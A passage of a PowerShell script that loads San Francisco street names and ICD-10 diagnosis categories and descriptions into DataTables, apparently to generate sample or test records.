ST","","WILDER","ST") + $null = $Streets.Rows.Add("WILDWOOD WAY","","WILDWOOD","WAY") + $null = $Streets.Rows.Add("WILLARD ST","","WILLARD","ST") + $null = $Streets.Rows.Add("WILLIAMS AVE","","WILLIAMS","AVE") + $null = $Streets.Rows.Add("WILLIAR AVE","","WILLIAR","AVE") + $null = $Streets.Rows.Add("WILLIE B KENNEDY DR","","WILLIE B KENNEDY","DR") + $null = $Streets.Rows.Add("WILLOW ST","","WILLOW","ST") + $null = $Streets.Rows.Add("WILLS ST","","WILLS","ST") + $null = $Streets.Rows.Add("WILMOT ST","","WILMOT","ST") + $null = $Streets.Rows.Add("WILSON ST","","WILSON","ST") + $null = $Streets.Rows.Add("WINDING WAY","","WINDING","WAY") + $null = $Streets.Rows.Add("WINDSOR PL","","WINDSOR","PL") + $null = $Streets.Rows.Add("WINFIELD ST","","WINFIELD","ST") + $null = $Streets.Rows.Add("WINN WAY","","WINN","WAY") + $null = $Streets.Rows.Add("WINSTON DR","","WINSTON","DR") + $null = $Streets.Rows.Add("WINTER PL","","WINTER","PL") + $null = $Streets.Rows.Add("WINTHROP ST","","WINTHROP","ST") + $null = $Streets.Rows.Add("WISCONSIN ST","","WISCONSIN","ST") + $null = $Streets.Rows.Add("WISSER CT","","WISSER","CT") + $null = $Streets.Rows.Add("WOOD ST","","WOOD","ST") + $null = $Streets.Rows.Add("WOODACRE DR","","WOODACRE","DR") + $null = $Streets.Rows.Add("WOODHAVEN CT","","WOODHAVEN","CT") + $null = $Streets.Rows.Add("WOODLAND AVE","","WOODLAND","AVE") + $null = $Streets.Rows.Add("WOODSIDE AVE","","WOODSIDE","AVE") + $null = $Streets.Rows.Add("WOODWARD ST","","WOODWARD","ST") + $null = $Streets.Rows.Add("WOOL CT","","WOOL","CT") + $null = $Streets.Rows.Add("WOOL ST","","WOOL","ST") + $null = $Streets.Rows.Add("WOOLSEY ST","","WOOLSEY","ST") + $null = $Streets.Rows.Add("WORCESTER AVE","","WORCESTER","AVE") + $null = $Streets.Rows.Add("WORDEN ST","","WORDEN","ST") + $null = $Streets.Rows.Add("WORTH ST","","WORTH","ST") + $null = $Streets.Rows.Add("WRIGHT CT","","WRIGHT","CT") + $null = $Streets.Rows.Add("WRIGHT LOOP","","WRIGHT","LOOP") + $null = $Streets.Rows.Add("WRIGHT ST","","WRIGHT","ST") + $null = $Streets.Rows.Add("WYMAN AVE","","WYMAN","AVE") + $null = $Streets.Rows.Add("WYTON LN","","WYTON","LN") + $null = $Streets.Rows.Add("YACHT RD","","YACHT","RD") + $null = $Streets.Rows.Add("YALE ST","","YALE","ST") + $null = $Streets.Rows.Add("YELLOW CAB ACCESS ROAD","","YELLOW CAB ACCESS ROAD","") + $null = $Streets.Rows.Add("YERBA BUENA AVE","","YERBA BUENA","AVE") + $null = $Streets.Rows.Add("YERBA BUENA DR","","YERBA BUENA","DR") + $null = $Streets.Rows.Add("YERBA BUENA LN","","YERBA BUENA","LN") + $null = $Streets.Rows.Add("YERBA BUENA RD","","YERBA BUENA","RD") + $null = $Streets.Rows.Add("YORBA ST","","YORBA","ST") + $null = $Streets.Rows.Add("YORK ST","","YORK","ST") + $null = $Streets.Rows.Add("YOSEMITE AVE","","YOSEMITE","AVE") + $null = $Streets.Rows.Add("YOUNG CT","","YOUNG","CT") + $null = $Streets.Rows.Add("YOUNG ST","","YOUNG","ST") + $null = $Streets.Rows.Add("YUKON ST","","YUKON","ST") + $null = $Streets.Rows.Add("ZAMPA LN","","ZAMPA","LN") + $null = $Streets.Rows.Add("ZANOWITZ AVE","","ZANOWITZ","AVE") + $null = $Streets.Rows.Add("AVOCET WAY","","AVOCET","WAY") + $null = $Streets.Rows.Add("ZENO PL","","ZENO","PL") + $null = $Streets.Rows.Add("ZIRCON PL","","ZIRCON","PL") + $null = $Streets.Rows.Add("ZOE ST","","ZOE","ST") + $null = $Streets.Rows.Add("ZOO RD","","ZOO","RD") + $null = $Streets.Rows.Add("DR TOM WADDELL PL","","DR TOM WADDELL","PL") + $null = $Streets.Rows.Add("AL SCOMA WAY","","AL SCOMA","WAY") + $null = $Streets.Rows.Add("UNNAMED 190","","UNNAMED 190","") + $null = $Streets.Rows.Add("UNNAMED 193","","UNNAMED 193","") + $null = $Streets.Rows.Add("UNNAMED 192","","UNNAMED 192","") + $null = $Streets.Rows.Add("PALACE DR","","PALACE","DR") + $null = $Streets.Rows.Add("MARTIN AVE","","MARTIN","AVE") + $null = $Streets.Rows.Add("MISSION BAY BLVD SOUTH","SOUTH","MISSION BAY","BLVD") + $null = $Streets.Rows.Add("BUENA VISTA AVE EAST","EAST","BUENA VISTA","AVE") + $null = $Streets.Rows.Add("CONSERVATORY DR EAST","EAST","CONSERVATORY","DR") + $null = $Streets.Rows.Add("BURNETT AVE NORTH","NORTH","BURNETT","AVE") + $null = $Streets.Rows.Add("LAKE MERCED HILL ST NORTH","NORTH","LAKE MERCED HILL","ST") + $null = $Streets.Rows.Add("BUENA VISTA AVE WEST","WEST","BUENA VISTA","AVE") + $null = $Streets.Rows.Add("WILLARD ST NORTH","NORTH","WILLARD","ST") + $null = $Streets.Rows.Add("FIRST DR EAST","EAST","FIRST","DR") + $null = $Streets.Rows.Add("LAKE MERCED HILL ST SOUTH","SOUTH","LAKE MERCED HILL","ST") + $null = $Streets.Rows.Add("MISSION BAY BLVD NORTH","NORTH","MISSION BAY","BLVD") + $null = $Streets.Rows.Add("25TH AVE NORTH","NORTH","25TH","AVE") + $null = $Streets.Rows.Add("CONSERVATORY DR WEST","WEST","CONSERVATORY","DR") + $null = $Streets.Rows.Add("FIRST DR WEST","WEST","FIRST","DR") + $null = $Streets.Rows.Add("ZANOWITZ ST","","ZANOWITZ","ST") + $null = $Streets.Rows.Add("AVENUE G","","AVENUE G","") + $null = $Streets.Rows.Add("ODD FELLOWS WAY","","ODD FELLOWS","WAY") + $null = $Streets.Rows.Add("JOHNSON ST","","JOHNSON","ST") + $null = $Streets.Rows.Add("MACKY LN","","MACKY","LN") + $null = $Streets.Rows.Add("FRIDA KAHLO WAY","","FRIDA KAHLO","WAY") + $null = $Streets.Rows.Add("WARRIORS WAY","","WARRIORS","WAY") + $null = $Streets.Rows.Add("SANDPIPER LN","","SANDPIPER","LN") + $null = $Streets.Rows.Add("PALM LN","","PALM","LN") + $null = $Streets.Rows.Add("WHIPPLE ST","","WHIPPLE","ST") + $null = $Streets.Rows.Add("FIFTH ST","","FIFTH","ST") + $null = $Streets.Rows.Add("EARL GAGE JR ST","","EARL GAGE JR","ST") + $null = $Streets.Rows.Add("MISSION CREEK","","MISSION CREEK","") + $null = $Streets.Rows.Add("CLIPPER COVE AVE","","CLIPPER COVE","AVE") + $null = $Streets.Rows.Add("GENE FRIEND WAY","","GENE FRIEND","WAY") + $null = $Streets.Rows.Add("MILTON I ROSS ST","","MILTON I ROSS","ST") + $null = $Streets.Rows.Add("ACACIA AVE","","ACACIA","AVE") + $null = $Streets.Rows.Add("PIERPOINT LN","","PIERPOINT","LN") + $null = $Streets.Rows.Add("WREN LN","","WREN","LN") + $null = $Streets.Rows.Add("TRADE WINDS AVE","","TRADE WINDS","AVE") + $null = $Streets.Rows.Add("WATERFRONT ST","","WATERFRONT","ST") + $null = $Streets.Rows.Add("VARA ST","","VARA","ST") + $null = $Streets.Rows.Add("UNNAMED ST","","UNNAMED","ST") + $null = $Streets.Rows.Add("SOTOMAYOR ST","","SOTOMAYOR","ST") + $null = $Streets.Rows.Add("SEVEN SEAS AVE","","SEVEN SEAS","AVE") + $null = $Streets.Rows.Add("PEACEMAKERS ST","","PEACEMAKERS","ST") + $null = $Streets.Rows.Add("UNNAMED 191","","UNNAMED 191","") + $null = $Streets.Rows.Add("PACIFICA ST","","PACIFICA","ST") + $null = $Streets.Rows.Add("SIESTA WAY","","SIESTA","WAY") + $null = $Streets.Rows.Add("KENNEDY PL","","KENNEDY","PL") + $null = $Streets.Rows.Add("MALOSI ST","","MALOSI","ST") + $null = $Streets.Rows.Add("INNES CT","","INNES","CT") + $null = $Streets.Rows.Add("GARDEN WALK","","GARDEN","WALK") + $null = $Streets.Rows.Add("LETTUCE LN","","LETTUCE","LN") + $null = $Streets.Rows.Add("PASSIFLORA WAY","","PASSIFLORA","WAY") + $null = $Streets.Rows.Add("PORTWAY PSGE","","PORTWAY","PSGE") + $null = $Streets.Rows.Add("CORINNE WOODS WAY","","CORINNE WOODS","WAY") + $null = $Streets.Rows.Add("GEORGIA LN","","GEORGIA","LN") + $null = $Streets.Rows.Add("CRAIG LN","","CRAIG","LN") + + # Diagnosis Codes + # https://www.cms.gov/Medicare/Coding/ICD10/2018-ICD-10-CM-and-GEMs + $DiagnosisList = New-Object System.Data.DataTable + $null = $DiagnosisList.Columns.Add("Code") + $null = $DiagnosisList.Columns.Add("Diagnosis") + $null = $DiagnosisList.Rows.Add("Cholera","Cholera due to Vibrio cholerae 01, biovar cholerae") + $null = $DiagnosisList.Rows.Add("Cholera","Cholera due to Vibrio cholerae 01, biovar eltor") + $null = $DiagnosisList.Rows.Add("Cholera","Cholera, unspecified") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid fever, unspecified") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid meningitis") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid fever with heart involvement") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid pneumonia") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid arthritis") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid osteomyelitis") + $null = $DiagnosisList.Rows.Add("Typhoid fever","Typhoid fever with other complications") + $null = $DiagnosisList.Rows.Add("Paratyphoid fever A","Paratyphoid fever A") + $null = $DiagnosisList.Rows.Add("Paratyphoid fever B","Paratyphoid fever B") + $null = $DiagnosisList.Rows.Add("Paratyphoid fever C","Paratyphoid fever C") + $null = $DiagnosisList.Rows.Add("Paratyphoid fever, unspecified","Paratyphoid fever, unspecified") + $null = $DiagnosisList.Rows.Add("Other salmonella infections","Salmonella enteritis") + $null = $DiagnosisList.Rows.Add("Other salmonella infections","Salmonella sepsis") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Localized salmonella infection, unspecified") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella meningitis") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella pneumonia") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella arthritis") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella osteomyelitis") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella pyelonephritis") + $null = $DiagnosisList.Rows.Add("Localized salmonella infections","Salmonella with other localized infection") + $null = $DiagnosisList.Rows.Add("Other specified salmonella infections","Other specified salmonella infections") + $null = $DiagnosisList.Rows.Add("Salmonella infection, unspecified","Salmonella infection, unspecified") + $null = $DiagnosisList.Rows.Add("Shigellosis","Shigellosis due to Shigella dysenteriae") + $null = $DiagnosisList.Rows.Add("Shigellosis","Shigellosis due to Shigella flexneri") + $null = $DiagnosisList.Rows.Add("Shigellosis","Shigellosis due to Shigella boydii") + $null = $DiagnosisList.Rows.Add("Shigellosis","Shigellosis due to Shigella sonnei") + $null = $DiagnosisList.Rows.Add("Shigellosis","Other shigellosis") + $null = $DiagnosisList.Rows.Add("Shigellosis","Shigellosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Enteropathogenic Escherichia coli infection") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Enterotoxigenic Escherichia coli infection") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Enteroinvasive Escherichia coli infection") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Enterohemorrhagic Escherichia coli infection") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Other intestinal Escherichia coli infections") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Campylobacter enteritis") + $null = $DiagnosisList.Rows.Add("Other bacterial intestinal infections","Enteritis due to Yersinia enterocolitica") + $null = $DiagnosisList.Rows.Add("Enterocolitis due to Clostridium difficile","Enterocolitis due to Clostridium difficile, recurrent") + $null = $DiagnosisList.Rows.Add("Enterocolitis due to Clostridium difficile","Enterocolitis due to Clostridium difficile, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Other specified bacterial intestinal infections","Other specified bacterial intestinal infections") + $null = $DiagnosisList.Rows.Add("Bacterial intestinal infection, unspecified","Bacterial intestinal infection, unspecified") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Foodborne staphylococcal intoxication") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Botulism food poisoning") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Foodborne Clostridium perfringens [Clostridium welchii] intoxication") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Foodborne Vibrio parahaemolyticus intoxication") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Foodborne Bacillus cereus intoxication") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Foodborne Vibrio vulnificus intoxication") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Other specified bacterial foodborne intoxications") + $null = $DiagnosisList.Rows.Add("Other bacterial foodborne intoxications, not elsewhere classified","Bacterial foodborne intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Amebiasis","Acute amebic dysentery") + $null = $DiagnosisList.Rows.Add("Amebiasis","Chronic intestinal amebiasis") + $null = $DiagnosisList.Rows.Add("Amebiasis","Amebic nondysenteric colitis") + $null = $DiagnosisList.Rows.Add("Amebiasis","Ameboma of intestine") + $null = $DiagnosisList.Rows.Add("Amebiasis","Amebic liver abscess") + $null = $DiagnosisList.Rows.Add("Amebiasis","Amebic lung abscess") + $null = $DiagnosisList.Rows.Add("Amebiasis","Amebic brain abscess") + $null = $DiagnosisList.Rows.Add("Amebiasis","Cutaneous amebiasis") + $null = $DiagnosisList.Rows.Add("Amebic infection of other sites","Amebic cystitis") + $null = $DiagnosisList.Rows.Add("Amebic infection of other sites","Other amebic genitourinary infections") + $null = $DiagnosisList.Rows.Add("Amebic infection of other sites","Other amebic infections") + $null = $DiagnosisList.Rows.Add("Amebiasis, unspecified","Amebiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Balantidiasis") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Giardiasis [lambliasis]") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Cryptosporidiosis") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Isosporiasis") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Cyclosporiasis") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Other specified protozoal intestinal diseases") + $null = $DiagnosisList.Rows.Add("Other protozoal intestinal diseases","Protozoal intestinal disease, unspecified") + $null = $DiagnosisList.Rows.Add("Viral and other specified intestinal infections","Rotaviral enteritis") + $null = $DiagnosisList.Rows.Add("Acute gastroenteropathy due to Norwalk agent and other small round viruses","Acute gastroenteropathy due to Norwalk agent") + $null = $DiagnosisList.Rows.Add("Acute gastroenteropathy due to Norwalk agent and other small round viruses","Acute gastroenteropathy due to other small round viruses") + $null = $DiagnosisList.Rows.Add("Adenoviral enteritis","Adenoviral enteritis") + $null = $DiagnosisList.Rows.Add("Other viral enteritis","Calicivirus enteritis") + $null = $DiagnosisList.Rows.Add("Other viral enteritis","Astrovirus enteritis") + $null = $DiagnosisList.Rows.Add("Other viral enteritis","Other viral enteritis") + $null = $DiagnosisList.Rows.Add("Viral intestinal infection, unspecified","Viral intestinal infection, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified intestinal infections","Other specified intestinal infections") + $null = $DiagnosisList.Rows.Add("Infectious gastroenteritis and colitis, unspecified","Infectious gastroenteritis and colitis, unspecified") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Tuberculosis of lung") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Tuberculosis of intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Tuberculosis of larynx, trachea and bronchus") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Tuberculous pleurisy") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Primary respiratory tuberculosis") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Other respiratory tuberculosis") + $null = $DiagnosisList.Rows.Add("Respiratory tuberculosis","Respiratory tuberculosis unspecified") + $null = $DiagnosisList.Rows.Add("Tuberculosis of nervous system","Tuberculous meningitis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of nervous system","Meningeal tuberculoma") + $null = $DiagnosisList.Rows.Add("Other tuberculosis of nervous system","Tuberculoma of brain and spinal cord") + $null = $DiagnosisList.Rows.Add("Other tuberculosis of nervous system","Tuberculous meningoencephalitis") + $null = $DiagnosisList.Rows.Add("Other tuberculosis of nervous system","Tuberculous neuritis") + $null = $DiagnosisList.Rows.Add("Other tuberculosis of nervous system","Other tuberculosis of nervous system") + $null = $DiagnosisList.Rows.Add("Tuberculosis of nervous system, unspecified","Tuberculosis of nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Tuberculosis of bones and joints","Tuberculosis of spine") + $null = $DiagnosisList.Rows.Add("Tuberculosis of bones and joints","Tuberculous arthritis of other joints") + $null = $DiagnosisList.Rows.Add("Tuberculosis of bones and joints","Tuberculosis of other bones") + $null = $DiagnosisList.Rows.Add("Tuberculosis of bones and joints","Other musculoskeletal tuberculosis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of genitourinary system, unspecified") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of kidney and ureter") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of bladder") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of other urinary organs") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of prostate") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of other male genital organs") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of cervix") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculous female pelvic inflammatory disease") + $null = $DiagnosisList.Rows.Add("Tuberculosis of genitourinary system","Tuberculosis of other female genital organs") + $null = $DiagnosisList.Rows.Add("Tuberculous peripheral lymphadenopathy","Tuberculous peripheral lymphadenopathy") + $null = $DiagnosisList.Rows.Add("Tuberculosis of intestines, peritoneum and mesenteric glands","Tuberculous peritonitis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of intestines, peritoneum and mesenteric glands","Tuberculous enteritis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of intestines, peritoneum and mesenteric glands","Retroperitoneal tuberculosis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of skin and subcutaneous tissue","Tuberculosis of skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Tuberculosis of eye, unspecified") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Tuberculous episcleritis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Tuberculous keratitis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Tuberculous chorioretinitis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Tuberculous iridocyclitis") + $null = $DiagnosisList.Rows.Add("Tuberculosis of eye","Other tuberculosis of eye") + $null = $DiagnosisList.Rows.Add("Tuberculosis of (inner) (middle) ear","Tuberculosis of (inner) (middle) ear") + $null = $DiagnosisList.Rows.Add("Tuberculosis of adrenal glands","Tuberculosis of adrenal glands") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of thyroid gland") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of other endocrine glands") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of digestive tract organs, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of heart") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of spleen") + $null = $DiagnosisList.Rows.Add("Tuberculosis of other specified organs","Tuberculosis of other sites") + $null = $DiagnosisList.Rows.Add("Miliary tuberculosis","Acute miliary tuberculosis of a single specified site") + $null = $DiagnosisList.Rows.Add("Miliary tuberculosis","Acute miliary tuberculosis of multiple sites") + $null = $DiagnosisList.Rows.Add("Miliary tuberculosis","Acute miliary tuberculosis, unspecified") + $null = $DiagnosisList.Rows.Add("Miliary tuberculosis","Other miliary tuberculosis") + $null = $DiagnosisList.Rows.Add("Miliary tuberculosis","Miliary tuberculosis, unspecified") + $null = $DiagnosisList.Rows.Add("Plague","Bubonic plague") + $null = $DiagnosisList.Rows.Add("Plague","Cellulocutaneous plague") + $null = $DiagnosisList.Rows.Add("Plague","Pneumonic plague") + $null = $DiagnosisList.Rows.Add("Plague","Plague meningitis") + $null = $DiagnosisList.Rows.Add("Plague","Septicemic plague") + $null = $DiagnosisList.Rows.Add("Plague","Other forms of plague") + $null = $DiagnosisList.Rows.Add("Plague","Plague, unspecified") + $null = $DiagnosisList.Rows.Add("Tularemia","Ulceroglandular tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Oculoglandular tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Pulmonary tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Gastrointestinal tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Generalized tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Other forms of tularemia") + $null = $DiagnosisList.Rows.Add("Tularemia","Tularemia, unspecified") + $null = $DiagnosisList.Rows.Add("Anthrax","Cutaneous anthrax") + $null = $DiagnosisList.Rows.Add("Anthrax","Pulmonary anthrax") + $null = $DiagnosisList.Rows.Add("Anthrax","Gastrointestinal anthrax") + $null = $DiagnosisList.Rows.Add("Anthrax","Anthrax sepsis") + $null = $DiagnosisList.Rows.Add("Anthrax","Other forms of anthrax") + $null = $DiagnosisList.Rows.Add("Anthrax","Anthrax, unspecified") + $null = $DiagnosisList.Rows.Add("Brucellosis","Brucellosis due to Brucella melitensis") + $null = $DiagnosisList.Rows.Add("Brucellosis","Brucellosis due to Brucella abortus") + $null = $DiagnosisList.Rows.Add("Brucellosis","Brucellosis due to Brucella suis") + $null = $DiagnosisList.Rows.Add("Brucellosis","Brucellosis due to Brucella canis") + $null = $DiagnosisList.Rows.Add("Brucellosis","Other brucellosis") + $null = $DiagnosisList.Rows.Add("Brucellosis","Brucellosis, unspecified") + $null = $DiagnosisList.Rows.Add("Glanders and melioidosis","Glanders") + $null = $DiagnosisList.Rows.Add("Glanders and melioidosis","Acute and fulminating melioidosis") + $null = $DiagnosisList.Rows.Add("Glanders and melioidosis","Subacute and chronic melioidosis") + $null = $DiagnosisList.Rows.Add("Glanders and melioidosis","Other melioidosis") + $null = $DiagnosisList.Rows.Add("Glanders and melioidosis","Melioidosis, unspecified") + $null = $DiagnosisList.Rows.Add("Rat-bite fevers","Spirillosis") + $null = $DiagnosisList.Rows.Add("Rat-bite fevers","Streptobacillosis") + $null = $DiagnosisList.Rows.Add("Rat-bite fevers","Rat-bite fever, unspecified") + $null = $DiagnosisList.Rows.Add("Erysipeloid","Cutaneous erysipeloid") + $null = $DiagnosisList.Rows.Add("Erysipeloid","Erysipelothrix sepsis") + $null = $DiagnosisList.Rows.Add("Erysipeloid","Other forms of erysipeloid") + $null = $DiagnosisList.Rows.Add("Erysipeloid","Erysipeloid, unspecified") + $null = $DiagnosisList.Rows.Add("Leptospirosis","Leptospirosis icterohemorrhagica") + $null = $DiagnosisList.Rows.Add("Other forms of leptospirosis","Aseptic meningitis in leptospirosis") + $null = $DiagnosisList.Rows.Add("Other forms of leptospirosis","Other forms of leptospirosis") + $null = $DiagnosisList.Rows.Add("Leptospirosis, unspecified","Leptospirosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other zoonotic bacterial diseases, not elsewhere classified","Pasteurellosis") + $null = $DiagnosisList.Rows.Add("Other zoonotic bacterial diseases, not elsewhere classified","Cat-scratch disease") + $null = $DiagnosisList.Rows.Add("Other zoonotic bacterial diseases, not elsewhere classified","Extraintestinal yersiniosis") + $null = $DiagnosisList.Rows.Add("Other zoonotic bacterial diseases, not elsewhere classified","Other specified zoonotic bacterial diseases, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other zoonotic bacterial diseases, not elsewhere classified","Zoonotic bacterial disease, unspecified") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Indeterminate leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Tuberculoid leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Borderline tuberculoid leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Borderline leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Borderline lepromatous leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Lepromatous leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Other forms of leprosy") + $null = $DiagnosisList.Rows.Add("Leprosy [Hansen's disease]","Leprosy, unspecified") + $null = $DiagnosisList.Rows.Add("Infection due to other mycobacteria","Pulmonary mycobacterial infection") + $null = $DiagnosisList.Rows.Add("Infection due to other mycobacteria","Cutaneous mycobacterial infection") + $null = $DiagnosisList.Rows.Add("Infection due to other mycobacteria","Disseminated mycobacterium avium-intracellulare complex (DMAC)") + $null = $DiagnosisList.Rows.Add("Infection due to other mycobacteria","Other mycobacterial infections") + $null = $DiagnosisList.Rows.Add("Infection due to other mycobacteria","Mycobacterial infection, unspecified") + $null = $DiagnosisList.Rows.Add("Listeriosis","Cutaneous listeriosis") + $null = $DiagnosisList.Rows.Add("Listerial meningitis and meningoencephalitis","Listerial meningitis") + $null = $DiagnosisList.Rows.Add("Listerial meningitis and meningoencephalitis","Listerial meningoencephalitis") + $null = $DiagnosisList.Rows.Add("Listerial sepsis","Listerial sepsis") + $null = $DiagnosisList.Rows.Add("Other forms of listeriosis","Oculoglandular listeriosis") + $null = $DiagnosisList.Rows.Add("Other forms of listeriosis","Listerial endocarditis") + $null = $DiagnosisList.Rows.Add("Other forms of listeriosis","Other forms of listeriosis") + $null = $DiagnosisList.Rows.Add("Listeriosis, unspecified","Listeriosis, unspecified") + $null = $DiagnosisList.Rows.Add("Tetanus neonatorum","Tetanus neonatorum") + $null = $DiagnosisList.Rows.Add("Obstetrical tetanus","Obstetrical tetanus") + $null = $DiagnosisList.Rows.Add("Other tetanus","Other tetanus") + $null = $DiagnosisList.Rows.Add("Diphtheria","Pharyngeal diphtheria") + $null = $DiagnosisList.Rows.Add("Diphtheria","Nasopharyngeal diphtheria") + $null = $DiagnosisList.Rows.Add("Diphtheria","Laryngeal diphtheria") + $null = $DiagnosisList.Rows.Add("Diphtheria","Cutaneous diphtheria") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic radiculomyelitis") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic polyneuritis") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic tubulo-interstitial nephropathy") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic cystitis") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Diphtheritic conjunctivitis") + $null = $DiagnosisList.Rows.Add("Other diphtheria","Other diphtheritic complications") + $null = $DiagnosisList.Rows.Add("Diphtheria, unspecified","Diphtheria, unspecified") + $null = $DiagnosisList.Rows.Add("Whooping cough due to Bordetella pertussis","Whooping cough due to Bordetella pertussis without pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough due to Bordetella pertussis","Whooping cough due to Bordetella pertussis with pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough due to Bordetella parapertussis","Whooping cough due to Bordetella parapertussis without pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough due to Bordetella parapertussis","Whooping cough due to Bordetella parapertussis with pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough due to other Bordetella species","Whooping cough due to other Bordetella species without pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough due to other Bordetella species","Whooping cough due to other Bordetella species with pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough, unspecified species","Whooping cough, unspecified species without pneumonia") + $null = $DiagnosisList.Rows.Add("Whooping cough, unspecified species","Whooping cough, unspecified species with pneumonia") + $null = $DiagnosisList.Rows.Add("Scarlet fever","Scarlet fever with otitis media") + $null = $DiagnosisList.Rows.Add("Scarlet fever","Scarlet fever with myocarditis") + $null = $DiagnosisList.Rows.Add("Scarlet fever","Scarlet fever with other complications") + $null = $DiagnosisList.Rows.Add("Scarlet fever","Scarlet fever, uncomplicated") + $null = $DiagnosisList.Rows.Add("Meningococcal infection","Meningococcal meningitis") + $null = $DiagnosisList.Rows.Add("Meningococcal infection","Waterhouse-Friderichsen syndrome") + $null = $DiagnosisList.Rows.Add("Meningococcal infection","Acute meningococcemia") + $null = $DiagnosisList.Rows.Add("Meningococcal infection","Chronic meningococcemia") + $null = $DiagnosisList.Rows.Add("Meningococcal 